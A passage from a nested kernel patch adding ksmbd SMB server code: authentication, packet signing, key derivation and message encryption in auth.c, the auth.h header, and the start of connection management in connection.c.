++	chgblob->TargetInfoArray.Length = cpu_to_le16(target_info_len);
++	chgblob->TargetInfoArray.MaximumLength = cpu_to_le16(target_info_len);
++	blob_len += target_info_len;
++	kfree(name);
++	ksmbd_debug(AUTH, "NTLMSSP SecurityBufferLength %d\n", blob_len);
++	return blob_len;
++}
++
++#ifdef CONFIG_SMB_SERVER_KERBEROS5
++int ksmbd_krb5_authenticate(struct ksmbd_session *sess, char *in_blob,
++			    int in_len, char *out_blob, int *out_len)
++{
++	struct ksmbd_spnego_authen_response *resp;
++	struct ksmbd_user *user = NULL;
++	int retval;
++
++	resp = ksmbd_ipc_spnego_authen_request(in_blob, in_len);
++	if (!resp) {
++		ksmbd_debug(AUTH, "SPNEGO_AUTHEN_REQUEST failure\n");
++		return -EINVAL;
++	}
++
++	if (!(resp->login_response.status & KSMBD_USER_FLAG_OK)) {
++		ksmbd_debug(AUTH, "krb5 authentication failure\n");
++		retval = -EPERM;
++		goto out;
++	}
++
++	if (*out_len <= resp->spnego_blob_len) {
++		ksmbd_debug(AUTH, "buf len %d, but blob len %d\n",
++			    *out_len, resp->spnego_blob_len);
++		retval = -EINVAL;
++		goto out;
++	}
++
++	if (resp->session_key_len > sizeof(sess->sess_key)) {
++		ksmbd_debug(AUTH, "session key is too long\n");
++		retval = -EINVAL;
++		goto out;
++	}
++
++	user = ksmbd_alloc_user(&resp->login_response);
++	if (!user) {
++		ksmbd_debug(AUTH, "login failure\n");
++		retval = -ENOMEM;
++		goto out;
++	}
++	sess->user = user;
++
++	memcpy(sess->sess_key, resp->payload, resp->session_key_len);
++	memcpy(out_blob, resp->payload + resp->session_key_len,
++	       resp->spnego_blob_len);
++	*out_len = resp->spnego_blob_len;
++	retval = 0;
++out:
++	kvfree(resp);
++	return retval;
++}
++#else
++int ksmbd_krb5_authenticate(struct ksmbd_session *sess, char *in_blob,
++			    int in_len, char *out_blob, int *out_len)
++{
++	return -EOPNOTSUPP;
++}
++#endif
++
++/**
++ * ksmbd_sign_smb2_pdu() - function to generate packet signing
++ * @conn:	connection
++ * @key:	signing key
++ * @iov:        buffer iov array
++ * @n_vec:	number of iovecs
++ * @sig:	signature value generated for client request packet
++ *
++ */
++int ksmbd_sign_smb2_pdu(struct ksmbd_conn *conn, char *key, struct kvec *iov,
++			int n_vec, char *sig)
++{
++	struct ksmbd_crypto_ctx *ctx;
++	int rc, i;
++
++	ctx = ksmbd_crypto_ctx_find_hmacsha256();
++	if (!ctx) {
++		ksmbd_debug(AUTH, "could not crypto alloc hmacmd5\n");
++		return -ENOMEM;
++	}
++
++	rc = crypto_shash_setkey(CRYPTO_HMACSHA256_TFM(ctx),
++				 key,
++				 SMB2_NTLMV2_SESSKEY_SIZE);
++	if (rc)
++		goto out;
++
++	rc = crypto_shash_init(CRYPTO_HMACSHA256(ctx));
++	if (rc) {
++		ksmbd_debug(AUTH, "hmacsha256 init error %d\n", rc);
++		goto out;
++	}
++
++	for (i = 0; i < n_vec; i++) {
++		rc = crypto_shash_update(CRYPTO_HMACSHA256(ctx),
++					 iov[i].iov_base,
++					 iov[i].iov_len);
++		if (rc) {
++			ksmbd_debug(AUTH, "hmacsha256 update error %d\n", rc);
++			goto out;
++		}
++	}
++
++	rc = crypto_shash_final(CRYPTO_HMACSHA256(ctx), sig);
++	if (rc)
++		ksmbd_debug(AUTH, "hmacsha256 generation error %d\n", rc);
++out:
++	ksmbd_release_crypto_ctx(ctx);
++	return rc;
++}
++
++/**
++ * ksmbd_sign_smb3_pdu() - function to generate packet signing
++ * @conn:	connection
++ * @key:	signing key
++ * @iov:        buffer iov array
++ * @n_vec:	number of iovecs
++ * @sig:	signature value generated for client request packet
++ *
++ */
++int ksmbd_sign_smb3_pdu(struct ksmbd_conn *conn, char *key, struct kvec *iov,
++			int n_vec, char *sig)
++{
++	struct ksmbd_crypto_ctx *ctx;
++	int rc, i;
++
++	ctx = ksmbd_crypto_ctx_find_cmacaes();
++	if (!ctx) {
++		ksmbd_debug(AUTH, "could not crypto alloc cmac\n");
++		return -ENOMEM;
++	}
++
++	rc = crypto_shash_setkey(CRYPTO_CMACAES_TFM(ctx),
++				 key,
++				 SMB2_CMACAES_SIZE);
++	if (rc)
++		goto out;
++
++	rc = crypto_shash_init(CRYPTO_CMACAES(ctx));
++	if (rc) {
++		ksmbd_debug(AUTH, "cmaces init error %d\n", rc);
++		goto out;
++	}
++
++	for (i = 0; i < n_vec; i++) {
++		rc = crypto_shash_update(CRYPTO_CMACAES(ctx),
++					 iov[i].iov_base,
++					 iov[i].iov_len);
++		if (rc) {
++			ksmbd_debug(AUTH, "cmaces update error %d\n", rc);
++			goto out;
++		}
++	}
++
++	rc = crypto_shash_final(CRYPTO_CMACAES(ctx), sig);
++	if (rc)
++		ksmbd_debug(AUTH, "cmaces generation error %d\n", rc);
++out:
++	ksmbd_release_crypto_ctx(ctx);
++	return rc;
++}
++
++struct derivation {
++	struct kvec label;
++	struct kvec context;
++	bool binding;
++};
++
++static int generate_key(struct ksmbd_conn *conn, struct ksmbd_session *sess,
++			struct kvec label, struct kvec context, __u8 *key,
++			unsigned int key_size)
++{
++	unsigned char zero = 0x0;
++	__u8 i[4] = {0, 0, 0, 1};
++	__u8 L128[4] = {0, 0, 0, 128};
++	__u8 L256[4] = {0, 0, 1, 0};
++	int rc;
++	unsigned char prfhash[SMB2_HMACSHA256_SIZE];
++	unsigned char *hashptr = prfhash;
++	struct ksmbd_crypto_ctx *ctx;
++
++	memset(prfhash, 0x0, SMB2_HMACSHA256_SIZE);
++	memset(key, 0x0, key_size);
++
++	ctx = ksmbd_crypto_ctx_find_hmacsha256();
++	if (!ctx) {
++		ksmbd_debug(AUTH, "could not crypto alloc hmacmd5\n");
++		return -ENOMEM;
++	}
++
++	rc = crypto_shash_setkey(CRYPTO_HMACSHA256_TFM(ctx),
++				 sess->sess_key,
++				 SMB2_NTLMV2_SESSKEY_SIZE);
++	if (rc)
++		goto smb3signkey_ret;
++
++	rc = crypto_shash_init(CRYPTO_HMACSHA256(ctx));
++	if (rc) {
++		ksmbd_debug(AUTH, "hmacsha256 init error %d\n", rc);
++		goto smb3signkey_ret;
++	}
++
++	rc = crypto_shash_update(CRYPTO_HMACSHA256(ctx), i, 4);
++	if (rc) {
++		ksmbd_debug(AUTH, "could not update with n\n");
++		goto smb3signkey_ret;
++	}
++
++	rc = crypto_shash_update(CRYPTO_HMACSHA256(ctx),
++				 label.iov_base,
++				 label.iov_len);
++	if (rc) {
++		ksmbd_debug(AUTH, "could not update with label\n");
++		goto smb3signkey_ret;
++	}
++
++	rc = crypto_shash_update(CRYPTO_HMACSHA256(ctx), &zero, 1);
++	if (rc) {
++		ksmbd_debug(AUTH, "could not update with zero\n");
++		goto smb3signkey_ret;
++	}
++
++	rc = crypto_shash_update(CRYPTO_HMACSHA256(ctx),
++				 context.iov_base,
++				 context.iov_len);
++	if (rc) {
++		ksmbd_debug(AUTH, "could not update with context\n");
++		goto smb3signkey_ret;
++	}
++
++	if (key_size == SMB3_ENC_DEC_KEY_SIZE &&
++	    (conn->cipher_type == SMB2_ENCRYPTION_AES256_CCM ||
++	     conn->cipher_type == SMB2_ENCRYPTION_AES256_GCM))
++		rc = crypto_shash_update(CRYPTO_HMACSHA256(ctx), L256, 4);
++	else
++		rc = crypto_shash_update(CRYPTO_HMACSHA256(ctx), L128, 4);
++	if (rc) {
++		ksmbd_debug(AUTH, "could not update with L\n");
++		goto smb3signkey_ret;
++	}
++
++	rc = crypto_shash_final(CRYPTO_HMACSHA256(ctx), hashptr);
++	if (rc) {
++		ksmbd_debug(AUTH, "Could not generate hmacmd5 hash error %d\n",
++			    rc);
++		goto smb3signkey_ret;
++	}
++
++	memcpy(key, hashptr, key_size);
++
++smb3signkey_ret:
++	ksmbd_release_crypto_ctx(ctx);
++	return rc;
++}
++
++static int generate_smb3signingkey(struct ksmbd_session *sess,
++				   struct ksmbd_conn *conn,
++				   const struct derivation *signing)
++{
++	int rc;
++	struct channel *chann;
++	char *key;
++
++	chann = lookup_chann_list(sess, conn);
++	if (!chann)
++		return 0;
++
++	if (conn->dialect >= SMB30_PROT_ID && signing->binding)
++		key = chann->smb3signingkey;
++	else
++		key = sess->smb3signingkey;
++
++	rc = generate_key(conn, sess, signing->label, signing->context, key,
++			  SMB3_SIGN_KEY_SIZE);
++	if (rc)
++		return rc;
++
++	if (!(conn->dialect >= SMB30_PROT_ID && signing->binding))
++		memcpy(chann->smb3signingkey, key, SMB3_SIGN_KEY_SIZE);
++
++	ksmbd_debug(AUTH, "dumping generated AES signing keys\n");
++	ksmbd_debug(AUTH, "Session Id    %llu\n", sess->id);
++	ksmbd_debug(AUTH, "Session Key   %*ph\n",
++		    SMB2_NTLMV2_SESSKEY_SIZE, sess->sess_key);
++	ksmbd_debug(AUTH, "Signing Key   %*ph\n",
++		    SMB3_SIGN_KEY_SIZE, key);
++	return 0;
++}
++
++int ksmbd_gen_smb30_signingkey(struct ksmbd_session *sess,
++			       struct ksmbd_conn *conn)
++{
++	struct derivation d;
++
++	d.label.iov_base = "SMB2AESCMAC";
++	d.label.iov_len = 12;
++	d.context.iov_base = "SmbSign";
++	d.context.iov_len = 8;
++	d.binding = conn->binding;
++
++	return generate_smb3signingkey(sess, conn, &d);
++}
++
++int ksmbd_gen_smb311_signingkey(struct ksmbd_session *sess,
++				struct ksmbd_conn *conn)
++{
++	struct derivation d;
++
++	d.label.iov_base = "SMBSigningKey";
++	d.label.iov_len = 14;
++	if (conn->binding) {
++		struct preauth_session *preauth_sess;
++
++		preauth_sess = ksmbd_preauth_session_lookup(conn, sess->id);
++		if (!preauth_sess)
++			return -ENOENT;
++		d.context.iov_base = preauth_sess->Preauth_HashValue;
++	} else {
++		d.context.iov_base = sess->Preauth_HashValue;
++	}
++	d.context.iov_len = 64;
++	d.binding = conn->binding;
++
++	return generate_smb3signingkey(sess, conn, &d);
++}
++
++struct derivation_twin {
++	struct derivation encryption;
++	struct derivation decryption;
++};
++
++static int generate_smb3encryptionkey(struct ksmbd_conn *conn,
++				      struct ksmbd_session *sess,
++				      const struct derivation_twin *ptwin)
++{
++	int rc;
++
++	rc = generate_key(conn, sess, ptwin->encryption.label,
++			  ptwin->encryption.context, sess->smb3encryptionkey,
++			  SMB3_ENC_DEC_KEY_SIZE);
++	if (rc)
++		return rc;
++
++	rc = generate_key(conn, sess, ptwin->decryption.label,
++			  ptwin->decryption.context,
++			  sess->smb3decryptionkey, SMB3_ENC_DEC_KEY_SIZE);
++	if (rc)
++		return rc;
++
++	ksmbd_debug(AUTH, "dumping generated AES encryption keys\n");
++	ksmbd_debug(AUTH, "Cipher type   %d\n", conn->cipher_type);
++	ksmbd_debug(AUTH, "Session Id    %llu\n", sess->id);
++	ksmbd_debug(AUTH, "Session Key   %*ph\n",
++		    SMB2_NTLMV2_SESSKEY_SIZE, sess->sess_key);
++	if (conn->cipher_type == SMB2_ENCRYPTION_AES256_CCM ||
++	    conn->cipher_type == SMB2_ENCRYPTION_AES256_GCM) {
++		ksmbd_debug(AUTH, "ServerIn Key  %*ph\n",
++			    SMB3_GCM256_CRYPTKEY_SIZE, sess->smb3encryptionkey);
++		ksmbd_debug(AUTH, "ServerOut Key %*ph\n",
++			    SMB3_GCM256_CRYPTKEY_SIZE, sess->smb3decryptionkey);
++	} else {
++		ksmbd_debug(AUTH, "ServerIn Key  %*ph\n",
++			    SMB3_GCM128_CRYPTKEY_SIZE, sess->smb3encryptionkey);
++		ksmbd_debug(AUTH, "ServerOut Key %*ph\n",
++			    SMB3_GCM128_CRYPTKEY_SIZE, sess->smb3decryptionkey);
++	}
++	return 0;
++}
++
++int ksmbd_gen_smb30_encryptionkey(struct ksmbd_conn *conn,
++				  struct ksmbd_session *sess)
++{
++	struct derivation_twin twin;
++	struct derivation *d;
++
++	d = &twin.encryption;
++	d->label.iov_base = "SMB2AESCCM";
++	d->label.iov_len = 11;
++	d->context.iov_base = "ServerOut";
++	d->context.iov_len = 10;
++
++	d = &twin.decryption;
++	d->label.iov_base = "SMB2AESCCM";
++	d->label.iov_len = 11;
++	d->context.iov_base = "ServerIn ";
++	d->context.iov_len = 10;
++
++	return generate_smb3encryptionkey(conn, sess, &twin);
++}
++
++int ksmbd_gen_smb311_encryptionkey(struct ksmbd_conn *conn,
++				   struct ksmbd_session *sess)
++{
++	struct derivation_twin twin;
++	struct derivation *d;
++
++	d = &twin.encryption;
++	d->label.iov_base = "SMBS2CCipherKey";
++	d->label.iov_len = 16;
++	d->context.iov_base = sess->Preauth_HashValue;
++	d->context.iov_len = 64;
++
++	d = &twin.decryption;
++	d->label.iov_base = "SMBC2SCipherKey";
++	d->label.iov_len = 16;
++	d->context.iov_base = sess->Preauth_HashValue;
++	d->context.iov_len = 64;
++
++	return generate_smb3encryptionkey(conn, sess, &twin);
++}
++
++int ksmbd_gen_preauth_integrity_hash(struct ksmbd_conn *conn, char *buf,
++				     __u8 *pi_hash)
++{
++	int rc;
++	struct smb2_hdr *rcv_hdr = smb2_get_msg(buf);
++	char *all_bytes_msg = (char *)&rcv_hdr->ProtocolId;
++	int msg_size = get_rfc1002_len(buf);
++	struct ksmbd_crypto_ctx *ctx = NULL;
++
++	if (conn->preauth_info->Preauth_HashId !=
++	    SMB2_PREAUTH_INTEGRITY_SHA512)
++		return -EINVAL;
++
++	ctx = ksmbd_crypto_ctx_find_sha512();
++	if (!ctx) {
++		ksmbd_debug(AUTH, "could not alloc sha512\n");
++		return -ENOMEM;
++	}
++
++	rc = crypto_shash_init(CRYPTO_SHA512(ctx));
++	if (rc) {
++		ksmbd_debug(AUTH, "could not init shashn");
++		goto out;
++	}
++
++	rc = crypto_shash_update(CRYPTO_SHA512(ctx), pi_hash, 64);
++	if (rc) {
++		ksmbd_debug(AUTH, "could not update with n\n");
++		goto out;
++	}
++
++	rc = crypto_shash_update(CRYPTO_SHA512(ctx), all_bytes_msg, msg_size);
++	if (rc) {
++		ksmbd_debug(AUTH, "could not update with n\n");
++		goto out;
++	}
++
++	rc = crypto_shash_final(CRYPTO_SHA512(ctx), pi_hash);
++	if (rc) {
++		ksmbd_debug(AUTH, "Could not generate hash err : %d\n", rc);
++		goto out;
++	}
++out:
++	ksmbd_release_crypto_ctx(ctx);
++	return rc;
++}
++
++int ksmbd_gen_sd_hash(struct ksmbd_conn *conn, char *sd_buf, int len,
++		      __u8 *pi_hash)
++{
++	int rc;
++	struct ksmbd_crypto_ctx *ctx = NULL;
++
++	ctx = ksmbd_crypto_ctx_find_sha256();
++	if (!ctx) {
++		ksmbd_debug(AUTH, "could not alloc sha256\n");
++		return -ENOMEM;
++	}
++
++	rc = crypto_shash_init(CRYPTO_SHA256(ctx));
++	if (rc) {
++		ksmbd_debug(AUTH, "could not init shashn");
++		goto out;
++	}
++
++	rc = crypto_shash_update(CRYPTO_SHA256(ctx), sd_buf, len);
++	if (rc) {
++		ksmbd_debug(AUTH, "could not update with n\n");
++		goto out;
++	}
++
++	rc = crypto_shash_final(CRYPTO_SHA256(ctx), pi_hash);
++	if (rc) {
++		ksmbd_debug(AUTH, "Could not generate hash err : %d\n", rc);
++		goto out;
++	}
++out:
++	ksmbd_release_crypto_ctx(ctx);
++	return rc;
++}
++
++static int ksmbd_get_encryption_key(struct ksmbd_work *work, __u64 ses_id,
++				    int enc, u8 *key)
++{
++	struct ksmbd_session *sess;
++	u8 *ses_enc_key;
++
++	if (enc)
++		sess = work->sess;
++	else
++		sess = ksmbd_session_lookup_all(work->conn, ses_id);
++	if (!sess)
++		return -EINVAL;
++
++	ses_enc_key = enc ? sess->smb3encryptionkey :
++		sess->smb3decryptionkey;
++	memcpy(key, ses_enc_key, SMB3_ENC_DEC_KEY_SIZE);
++
++	return 0;
++}
++
++static inline void smb2_sg_set_buf(struct scatterlist *sg, const void *buf,
++				   unsigned int buflen)
++{
++	void *addr;
++
++	if (is_vmalloc_addr(buf))
++		addr = vmalloc_to_page(buf);
++	else
++		addr = virt_to_page(buf);
++	sg_set_page(sg, addr, buflen, offset_in_page(buf));
++}
++
++static struct scatterlist *ksmbd_init_sg(struct kvec *iov, unsigned int nvec,
++					 u8 *sign)
++{
++	struct scatterlist *sg;
++	unsigned int assoc_data_len = sizeof(struct smb2_transform_hdr) - 20;
++	int i, nr_entries[3] = {0}, total_entries = 0, sg_idx = 0;
++
++	if (!nvec)
++		return NULL;
++
++	for (i = 0; i < nvec - 1; i++) {
++		unsigned long kaddr = (unsigned long)iov[i + 1].iov_base;
++
++		if (is_vmalloc_addr(iov[i + 1].iov_base)) {
++			nr_entries[i] = ((kaddr + iov[i + 1].iov_len +
++					PAGE_SIZE - 1) >> PAGE_SHIFT) -
++				(kaddr >> PAGE_SHIFT);
++		} else {
++			nr_entries[i]++;
++		}
++		total_entries += nr_entries[i];
++	}
++
++	/* Add two entries for transform header and signature */
++	total_entries += 2;
++
++	sg = kmalloc_array(total_entries, sizeof(struct scatterlist), GFP_KERNEL);
++	if (!sg)
++		return NULL;
++
++	sg_init_table(sg, total_entries);
++	smb2_sg_set_buf(&sg[sg_idx++], iov[0].iov_base + 24, assoc_data_len);
++	for (i = 0; i < nvec - 1; i++) {
++		void *data = iov[i + 1].iov_base;
++		int len = iov[i + 1].iov_len;
++
++		if (is_vmalloc_addr(data)) {
++			int j, offset = offset_in_page(data);
++
++			for (j = 0; j < nr_entries[i]; j++) {
++				unsigned int bytes = PAGE_SIZE - offset;
++
++				if (!len)
++					break;
++
++				if (bytes > len)
++					bytes = len;
++
++				sg_set_page(&sg[sg_idx++],
++					    vmalloc_to_page(data), bytes,
++					    offset_in_page(data));
++
++				data += bytes;
++				len -= bytes;
++				offset = 0;
++			}
++		} else {
++			sg_set_page(&sg[sg_idx++], virt_to_page(data), len,
++				    offset_in_page(data));
++		}
++	}
++	smb2_sg_set_buf(&sg[sg_idx], sign, SMB2_SIGNATURE_SIZE);
++	return sg;
++}
++
++int ksmbd_crypt_message(struct ksmbd_work *work, struct kvec *iov,
++			unsigned int nvec, int enc)
++{
++	struct ksmbd_conn *conn = work->conn;
++	struct smb2_transform_hdr *tr_hdr = smb2_get_msg(iov[0].iov_base);
++	unsigned int assoc_data_len = sizeof(struct smb2_transform_hdr) - 20;
++	int rc;
++	struct scatterlist *sg;
++	u8 sign[SMB2_SIGNATURE_SIZE] = {};
++	u8 key[SMB3_ENC_DEC_KEY_SIZE];
++	struct aead_request *req;
++	char *iv;
++	unsigned int iv_len;
++	struct crypto_aead *tfm;
++	unsigned int crypt_len = le32_to_cpu(tr_hdr->OriginalMessageSize);
++	struct ksmbd_crypto_ctx *ctx;
++
++	rc = ksmbd_get_encryption_key(work,
++				      le64_to_cpu(tr_hdr->SessionId),
++				      enc,
++				      key);
++	if (rc) {
++		pr_err("Could not get %scryption key\n", enc ? "en" : "de");
++		return rc;
++	}
++
++	if (conn->cipher_type == SMB2_ENCRYPTION_AES128_GCM ||
++	    conn->cipher_type == SMB2_ENCRYPTION_AES256_GCM)
++		ctx = ksmbd_crypto_ctx_find_gcm();
++	else
++		ctx = ksmbd_crypto_ctx_find_ccm();
++	if (!ctx) {
++		pr_err("crypto alloc failed\n");
++		return -ENOMEM;
++	}
++
++	if (conn->cipher_type == SMB2_ENCRYPTION_AES128_GCM ||
++	    conn->cipher_type == SMB2_ENCRYPTION_AES256_GCM)
++		tfm = CRYPTO_GCM(ctx);
++	else
++		tfm = CRYPTO_CCM(ctx);
++
++	if (conn->cipher_type == SMB2_ENCRYPTION_AES256_CCM ||
++	    conn->cipher_type == SMB2_ENCRYPTION_AES256_GCM)
++		rc = crypto_aead_setkey(tfm, key, SMB3_GCM256_CRYPTKEY_SIZE);
++	else
++		rc = crypto_aead_setkey(tfm, key, SMB3_GCM128_CRYPTKEY_SIZE);
++	if (rc) {
++		pr_err("Failed to set aead key %d\n", rc);
++		goto free_ctx;
++	}
++
++	rc = crypto_aead_setauthsize(tfm, SMB2_SIGNATURE_SIZE);
++	if (rc) {
++		pr_err("Failed to set authsize %d\n", rc);
++		goto free_ctx;
++	}
++
++	req = aead_request_alloc(tfm, GFP_KERNEL);
++	if (!req) {
++		rc = -ENOMEM;
++		goto free_ctx;
++	}
++
++	if (!enc) {
++		memcpy(sign, &tr_hdr->Signature, SMB2_SIGNATURE_SIZE);
++		crypt_len += SMB2_SIGNATURE_SIZE;
++	}
++
++	sg = ksmbd_init_sg(iov, nvec, sign);
++	if (!sg) {
++		pr_err("Failed to init sg\n");
++		rc = -ENOMEM;
++		goto free_req;
++	}
++
++	iv_len = crypto_aead_ivsize(tfm);
++	iv = kzalloc(iv_len, GFP_KERNEL);
++	if (!iv) {
++		rc = -ENOMEM;
++		goto free_sg;
++	}
++
++	if (conn->cipher_type == SMB2_ENCRYPTION_AES128_GCM ||
++	    conn->cipher_type == SMB2_ENCRYPTION_AES256_GCM) {
++		memcpy(iv, (char *)tr_hdr->Nonce, SMB3_AES_GCM_NONCE);
++	} else {
++		iv[0] = 3;
++		memcpy(iv + 1, (char *)tr_hdr->Nonce, SMB3_AES_CCM_NONCE);
++	}
++
++	aead_request_set_crypt(req, sg, sg, crypt_len, iv);
++	aead_request_set_ad(req, assoc_data_len);
++	aead_request_set_callback(req, CRYPTO_TFM_REQ_MAY_SLEEP, NULL, NULL);
++
++	if (enc)
++		rc = crypto_aead_encrypt(req);
++	else
++		rc = crypto_aead_decrypt(req);
++	if (rc)
++		goto free_iv;
++
++	if (enc)
++		memcpy(&tr_hdr->Signature, sign, SMB2_SIGNATURE_SIZE);
++
++free_iv:
++	kfree(iv);
++free_sg:
++	kfree(sg);
++free_req:
++	kfree(req);
++free_ctx:
++	ksmbd_release_crypto_ctx(ctx);
++	return rc;
++}
+diff --git a/fs/smb/server/auth.h b/fs/smb/server/auth.h
+new file mode 100644
+index 0000000000000..362b6159a6cff
+--- /dev/null
++++ b/fs/smb/server/auth.h
+@@ -0,0 +1,71 @@
++/* SPDX-License-Identifier: GPL-2.0-or-later */
++/*
++ *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
++ */
++
++#ifndef __AUTH_H__
++#define __AUTH_H__
++
++#include "ntlmssp.h"
++
++#ifdef CONFIG_SMB_SERVER_KERBEROS5
++#define AUTH_GSS_LENGTH		96
++#define AUTH_GSS_PADDING	0
++#else
++#define AUTH_GSS_LENGTH		74
++#define AUTH_GSS_PADDING	6
++#endif
++
++#define CIFS_HMAC_MD5_HASH_SIZE	(16)
++#define CIFS_NTHASH_SIZE	(16)
++
++/*
++ * Size of the ntlm client response
++ */
++#define CIFS_AUTH_RESP_SIZE		24
++#define CIFS_SMB1_SIGNATURE_SIZE	8
++#define CIFS_SMB1_SESSKEY_SIZE		16
++
++#define KSMBD_AUTH_NTLMSSP	0x0001
++#define KSMBD_AUTH_KRB5		0x0002
++#define KSMBD_AUTH_MSKRB5	0x0004
++#define KSMBD_AUTH_KRB5U2U	0x0008
++
++struct ksmbd_session;
++struct ksmbd_conn;
++struct ksmbd_work;
++struct kvec;
++
++int ksmbd_crypt_message(struct ksmbd_work *work, struct kvec *iov,
++			unsigned int nvec, int enc);
++void ksmbd_copy_gss_neg_header(void *buf);
++int ksmbd_auth_ntlmv2(struct ksmbd_conn *conn, struct ksmbd_session *sess,
++		      struct ntlmv2_resp *ntlmv2, int blen, char *domain_name,
++		      char *cryptkey);
++int ksmbd_decode_ntlmssp_auth_blob(struct authenticate_message *authblob,
++				   int blob_len, struct ksmbd_conn *conn,
++				   struct ksmbd_session *sess);
++int ksmbd_decode_ntlmssp_neg_blob(struct negotiate_message *negblob,
++				  int blob_len, struct ksmbd_conn *conn);
++unsigned int
++ksmbd_build_ntlmssp_challenge_blob(struct challenge_message *chgblob,
++				   struct ksmbd_conn *conn);
++int ksmbd_krb5_authenticate(struct ksmbd_session *sess, char *in_blob,
++			    int in_len,	char *out_blob, int *out_len);
++int ksmbd_sign_smb2_pdu(struct ksmbd_conn *conn, char *key, struct kvec *iov,
++			int n_vec, char *sig);
++int ksmbd_sign_smb3_pdu(struct ksmbd_conn *conn, char *key, struct kvec *iov,
++			int n_vec, char *sig);
++int ksmbd_gen_smb30_signingkey(struct ksmbd_session *sess,
++			       struct ksmbd_conn *conn);
++int ksmbd_gen_smb311_signingkey(struct ksmbd_session *sess,
++				struct ksmbd_conn *conn);
++int ksmbd_gen_smb30_encryptionkey(struct ksmbd_conn *conn,
++				  struct ksmbd_session *sess);
++int ksmbd_gen_smb311_encryptionkey(struct ksmbd_conn *conn,
++				   struct ksmbd_session *sess);
++int ksmbd_gen_preauth_integrity_hash(struct ksmbd_conn *conn, char *buf,
++				     __u8 *pi_hash);
++int ksmbd_gen_sd_hash(struct ksmbd_conn *conn, char *sd_buf, int len,
++		      __u8 *pi_hash);
++#endif
+diff --git a/fs/smb/server/connection.c b/fs/smb/server/connection.c
+new file mode 100644
+index 0000000000000..e1d2be19cddfa
+--- /dev/null
++++ b/fs/smb/server/connection.c
+@@ -0,0 +1,485 @@
++// SPDX-License-Identifier: GPL-2.0-or-later
++/*
++ *   Copyright (C) 2016 Namjae Jeon <namjae.jeon@protocolfreedom.org>
++ *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
++ */
++
++#include <linux/mutex.h>
++#include <linux/freezer.h>
++#include <linux/module.h>
++
++#include "server.h"
++#include "smb_common.h"
++#include "mgmt/ksmbd_ida.h"
++#include "connection.h"
++#include "transport_tcp.h"
++#include "transport_rdma.h"
++
++static DEFINE_MUTEX(init_lock);
++
++static struct ksmbd_conn_ops default_conn_ops;
++
++LIST_HEAD(conn_list);
++DECLARE_RWSEM(conn_list_lock);
++
++/**
++ * ksmbd_conn_free() - free resources of the connection instance
++ *
++ * @conn:	connection instance to be cleand up
++ *
++ * During the thread termination, the corresponding conn instance
++ * resources(sock/memory) are released and finally the conn object is freed.
++ */
++void ksmbd_conn_free(struct ksmbd_conn *conn)
++{
++	down_write(&conn_list_lock);
++	list_del(&conn->conns_list);
++	up_write(&conn_list_lock);
++
++	xa_destroy(&conn->sessions);
++	kvfree(conn->request_buf);
++	kfree(conn->preauth_info);
++	kfree(conn);
++}
++
++/**
++ * ksmbd_conn_alloc() - initialize a new connection instance
++ *
++ * Return:	ksmbd_conn struct on success, otherwise NULL
++ */
++struct ksmbd_conn *ksmbd_conn_alloc(void)
++{
++	struct ksmbd_conn *conn;
++
++	conn = kzalloc(sizeof(struct ksmbd_conn), GFP_KERNEL);
++	if (!conn)
++		return NULL;
++
++	conn->need_neg = true;
++	ksmbd_conn_set_new(conn);
++	conn->local_nls = load_nls("utf8");
++	if (!conn->local_nls)
++		conn->local_nls = load_nls_default();
++	if (IS_ENABLED(CONFIG_UNICODE))
++		conn->um = utf8_load(UNICODE_AGE(12, 1, 0));
++	else
++		conn->um = ERR_PTR(-EOPNOTSUPP);
++	if (IS_ERR(conn->um))
++		conn->um = NULL;
++	atomic_set(&conn->req_running, 0);
++	atomic_set(&conn->r_count, 0);
++	conn->total_credits = 1;
++	conn->outstanding_credits = 0;
++
++	init_waitqueue_head(&conn->req_running_q);
++	init_waitqueue_head(&conn->r_count_q);
++	INIT_LIST_HEAD(&conn->conns_list);
++	INIT_LIST_HEAD(&conn->requests);
++	INIT_LIST_HEAD(&conn->async_requests);
++	spin_lock_init(&conn->request_lock);
++	spin_lock_init(&conn->credits_lock);
++	ida_init(&conn->async_ida);
++	xa_init(&conn->sessions);
++
++	spin_lock_init(&conn->llist_lock);
++	INIT_LIST_HEAD(&conn->lock_list);
++
++	down_write(&conn_list_lock);
++	list_add(&conn->conns_list, &conn_list);
++	up_write(&conn_list_lock);
++	return conn;
++}
++
++bool ksmbd_conn_lookup_dialect(struct ksmbd_conn *c)
++{
++	struct ksmbd_conn *t;
++	bool ret = false;
++
++	down_read(&conn_list_lock);
++	list_for_each_entry(t, &conn_list, conns_list) {
++		if (memcmp(t->ClientGUID, c->ClientGUID, SMB2_CLIENT_GUID_SIZE))
++			continue;
++
++		ret = true;
++		break;
++	}
++	up_read(&conn_list_lock);
++	return ret;
++}
++
++void ksmbd_conn_enqueue_request(struct ksmbd_work *work)
++{
++	struct ksmbd_conn *conn = work->conn;
++	struct list_head *requests_queue = NULL;
++
++	if (conn->ops->get_cmd_val(work) != SMB2_CANCEL_HE) {
++		requests_queue = &conn->requests;
++		work->syncronous = true;
++	}
++
++	if (requests_queue) {
++		atomic_inc(&conn->req_running);
++		spin_lock(&conn->request_lock);
++		list_add_tail(&work->request_entry, requests_queue);
++		spin_unlock(&conn->request_lock);
++	}
++}
++
++int ksmbd_conn_try_dequeue_request(struct ksmbd_work *work)
++{
++	struct ksmbd_conn *conn = work->conn;
++	int ret = 1;
++
++	if (list_empty(&work->request_entry) &&
++	    list_empty(&work->async_request_entry))
++		return 0;
++
++	if (!work->multiRsp)
++		atomic_dec(&conn->req_running);
++	spin_lock(&conn->request_lock);
++	if (!work->multiRsp) {
++		list_del_init(&work->request_entry);
++		if (work->syncronous == false)
++			list_del_init(&work->async_request_entry);
++		ret = 0;
++	}
++	spin_unlock(&conn->request_lock);
++
++	wake_up_all(&conn->req_running_q);
++	return ret;
++}
++
++void ksmbd_conn_lock(struct ksmbd_conn *conn)
++{
++	mutex_lock(&conn->srv_mutex);
++}
++
++void ksmbd_conn_unlock(struct ksmbd_conn *conn)
++{
++	mutex_unlock(&conn->srv_mutex);
++}
++
++void ksmbd_all_conn_set_status(u64 sess_id, u32 status)
++{
++	struct ksmbd_conn *conn;
++
++	down_read(&conn_list_lock);
++	list_for_each_entry(conn, &conn_list, conns_list) {
++		if (conn->binding || xa_load(&conn->sessions, sess_id))
++			WRITE_ONCE(conn->status, status);
++	}
++	up_read(&conn_list_lock);
++}
++
++void ksmbd_conn_wait_idle(struct ksmbd_conn *conn, u64 sess_id)
++{
